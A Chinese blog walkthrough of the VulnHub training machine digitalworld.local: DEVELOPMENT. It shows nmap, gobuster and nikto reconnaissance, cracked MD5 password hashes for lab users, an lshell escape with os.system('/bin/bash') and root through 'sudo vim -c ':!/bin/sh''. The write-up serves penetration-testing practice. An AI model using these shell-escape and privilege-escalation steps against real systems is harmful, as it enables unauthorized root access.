VulnHub-digitalworld.local: DEVELOPMENT渗透学习

最新推荐文章于 2023-04-09 19:08:19 发布
最新推荐文章于 2023-04-09 19:08:19 发布
阅读量359 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/G20171130/article/details/118827140
版权

前言

靶机地址:https://download.vulnhub.com/digitalworld/devt-improved.7z

靶机难度:中级(CTF)

靶机发布日期:2018 年 12 月 28 日

靶机描述:这台机器让我们想起了一个开发环境:错误配置占据了主导地位。这是专为OSCP练习而设计的,机器的原始版本用于CTF。它现在复活了,并且比原来的更加邪恶。

如果你必须有关于这台机器的提示(即使他们可能不会对你有很大帮助,除非你在你的机器上扎根!):开发是(#1):与生产不同,(#2):一堆代码,(# 3):建设中。

注意:一些用户报告说,在积极扫描时,该框可能看起来“不稳定”。主页给出了原因的线索。

目标:得到root权限

作者:我是小小白

时间:2021-07-16

请注意:
本博客所有文章,仅供研究测试及学习IT技术之用,严禁传播和用于非法用途,否则所产生的一切后果由观看文章、视频的人自行承担;本博客网以及发帖人不承担任何责任!

信息收集

注意:目标机器网卡可能不会开机自启,需要手动激活下;

需改root密码操作步骤:

1、重启ubuntu,随即长按shift进入grub菜单;

2、选择第二个高级模式recovery mode进入

3、进入Recovery Menu界面,选择root   Drop to root shell prompt ,也就是获取root权限

4、敲入:passwd "用户名" 之后再敲两次密码就可以修改用户名密码了。

   另外想修改root密码可使用下面的方法:

    修改root密码操作:#passwd

    输入新密码:#    

    再输入一遍密码:#

    这是设置root密码,如果是设置其它用户密码使用命令:passwd 用户名 即可

5、按ctrl+alt+del重启系统,完成。

主机发现

我们在VM中需要确定攻击目标的IP地址,可以使用netdiscover/nmap来获取目标主机的IP地址:

nmap -sP 192.168.11.0/16 -T5
参数解读:
	-sP : 用ping扫描判断主机是否存活,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping
	-T5: 指定扫描过程使用的时序,总有6个级别(0-5),级别越高,扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T5

端口扫描

我们已经找到了目标计算机IP地址:192.168.11.4

第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描:

nmap -sS -sV -sC -O -T5  -Pn -p- 192.168.11.4
参数解读:
	-A :启用-A选项之后,Nmap将检测目标主机的下述信息
        服务版本识别(-sV);
        操作系统识别(-O);
        脚本扫描(-sC);
        Traceroute(–traceroute)
	-sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描
	-sV: 指定让Nmap进行服务版本扫描
	-p-:进行全端口扫描
	-Pn:禁用主机检测(-Pn)

PORT

SERVICE

VERSION DETECTION

TCP: 113

oident

oident

TCP: 139、445

Samba

smbd 3.X - 4.X (workgroup: WORKGROUP)

TCP: 8080

HTTP

IIS 6.0

目录枚举

gobuster dir -u http://192.168.11.4/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 --random-agent

存在异常目录html_pages

指纹识别

漏洞发现

Nikto 扫描

nikto :开源的WEB扫描评估软件,可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等

nikto -h 192.168.11.4  -C all

可能做了限制,没有任何扫描结果;

漏洞利用

HASH破解

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb
intern, 4a8a2b374f463b7aedbb44a066363b81
patrick, 87e6d56ce79af90dbe07d387d3d0579e
qiu, ee64497098d0926d198f54f6d5431f98
MD5解密,结果如下:
admin:无法解密
intern:12345678900987654321
patrick:P@ssw0rd25
qiu:qiu

权限提升

[22][ssh] host: 192.168.11.4   login: intern   password: 12345678900987654321
返回交互式shell

echo os.system('/bin/bash')

切换到用户patrick,查看文件可以以root身份运行;

这里是利用的vim提权;

 sudo vim -c ':!/bin/sh'

可以看到成功提权到root权限。

辅助提权检测脚本

也可以利用linux提权辅助脚本进行快速检测;https://github.com/mzet-/linux-exploit-suggester.git

F10Sec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
development-improved靶场渗透
qq_20032803的博客
02-05 766
1.扫描主机 root@kali:~# nmap --script vuln 192.168.100.131 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-05 01:08 EST Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Digitalworld.local (Development)--VulnHub靶机学习记录
weixin_45509443的博客
07-24 608
1.端口扫描 2.登录8080看下,根据说明有隐藏页面,然而nikto dirb等都无法目录扫描,应该也是像页面提示说的一样被入侵检测系统拦截了,那怎么找目录呢,这就有点脑洞了,原来隐藏目录就是html_pages 进入隐藏目录,接下来就是一顿翻目录了 最后在/development.html目录,查看源码发现提示,进入秘密页面 /developmentsecretpage 发现登录页面 ,无论输入什么都是报错,爆破注入什么的别想了,都是连接超时,smb服务爆破同样结局,看来..
Vulnhub靶机:DIGITALWORLD.LOCAL_ DEVELOPMENT
LainWith的博客
01-12 612
(此系列共9台)发布日期:2018 年 12 月 28 日难度:中级运行环境:Virtualbox运行失败,VMware运行成功目标:取得 root 权限备注:OSCP类型靶机,靶机容易崩溃主机发现端口扫描+漏洞扫描错误信息泄露破解hashlshell绕过sudo提权。
Vulnhub靶机 development-improved
菜浪马废的博客
05-03 410
信息收集 patrick可能是一个用户名 html_pages 貌似不能dirb扫描 老是断开 找到一个文件 随便输入账号 报错了
Vulnhub:Digitalworld.local (Development)靶机
qq_43884092的博客
04-09 501
访问development目录,提示存在一个流量包,查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php,访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错,根据报错搜索关键字
靶场:digitalworld.local: VENGEANCE
03-30
没有截图,但是有用的东西,全部都写上了 。一步一步来就能得到root。每一步都有描述,都有讲解。其中没有的部分,就没有卸载wp中,也不用操作,少走弯路。
centos安装jdk1.8时出现没有/lib/ld-linux.so.2:这个文件的原因分析
01-10
-bash: /usr/local/jdk/jdk1.8.0_181/bin/java: /lib/ld-linux.so.2: bad ELF interpreter: No such file or directory 安装完后 java -version 查看版本出现: 原因是:没有那个文件或目录,找了很久发现需要...
cuda-repo-rhel7-10-0-local-10.0.130-410.48-1.0-1.x86_64.7z.001
12-24
cuda-repo
nginx-local-ip:local-ip.co HTTPS Nginx反向代理
03-17
$ dig 10-0-0-1.my.local-ip.co ;; ANSWER SECTION: 10-0-0-1.my.local-ip.co. 299 IN A 10.0.0.1 因此,拥有公共证书和可解析为本地IP地址的公共DNS,您可以启动HTTPS服务器以代理使用任何堆栈构建的本地应用,并...
perl-local-lib-path.vim:perl-local-lib-path 是 vim 路径的帮手
06-02
perl-local-lib-path perl-local-lib-path是一个帮助程序,可为您的 perl 项目设置 vim 路径。 它会自动将 vim 路径设置为本地 lib 目录,如通过 carton 和 local::lib 安装到您的项目中的extlib和local/perl5/lib ...
靶机渗透练习53-digitalworld.local:BRAVERY
hirak0的博客
04-19 4855
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Description This machine hopes to inspire BRAVERY in you; this machine may surprise you from the outside. This is designed for OSCP practice, and the original version of the machine
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
Vulnhub靶机 Digitalworld.local (JOY)
菜浪马废的博客
05-03 759
ftp可以任何人登录 查看一下 查看version_control文件 看见:proftpd 1.3.5
vulnhub靶机-DIGITALWORLD.LOCAL: SNAKEOIL
臭nana的博客
09-10 1699
1、找到靶机ip:192.168.162.132 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????kali)-[~] └─# nmap -A -p- 192.168.116.132 Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for 192.168.116.132 Host is up (0.00033s latency). Not shown: 65533 c
Vulnhub靶机 Digitalworld.local (Mercy v2)
菜浪马废的博客
05-04 446
i在这里插入图片描述 敲门呗 还可以内核提权
vulnhub——digitalworldlocal
willow_liang的博客
02-06 564
目录 digitalworldlocal-bravery,281 1.端口扫描 2.挂载nfs目录下的文件 3.使用enum4linux枚举 5.提权 digitalworldlocal-bravery,281 1.端口扫描 2.挂载nfs目录下的文件 showmount -e 192.168.0.107 mkdir /tmp/bra mount -t nfs 192.168.0.107:/var/nfsshare /tmp/bra ..
Digitalworld.local: JOY Vulnhub靶场题解
qq_42133828的博客
08-16 870
前期准备 镜像下载 https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux,ubuntu 靶机:ip随配(192.168.119.137) 渗透开始 1.nmap发现主机,并扫描其ip信息 nmap -A 192.168.119.137 2.发现ftp相...
vulnhub digitalworld.local: DEVELOPMENT
箭雨镜屋
07-04 562
渗透思路:nmap扫描----根据网页和注释中的各种提示找到developmentsecretpage----利用Simple Text-File Login script(slogin_lib.inc.php)的敏感信息泄露获得用户ssh密码----绕过Lshell----vim/nano sudo提权
靶机渗透练习58-digitalworld.local:VENGEANCE
hirak0的博客
04-19 1589
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/ Description 2021 brings us the VENGEANCE of digitalworld.local! A box born out of COVID-19. This machine was built whilst the author was mulling over life in infosec whilst doing hi
./start-all.sh:行32: /opt/module/spark-local/sbin/start-master.sh: 权限不够 ./start-all.sh:行35: /opt/module/spark-local/sbin/start-slaves.sh: 权限不够 怎么办
最新发布
06-08
chmod +x /opt/module/spark-local/sbin/start-master.sh chmod +x /opt/module/spark-local/sbin/start-slaves.sh ``` 该命令会添加执行权限,允许您执行这两个脚本。然后,您可以再次尝试运行 `start-all.sh` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值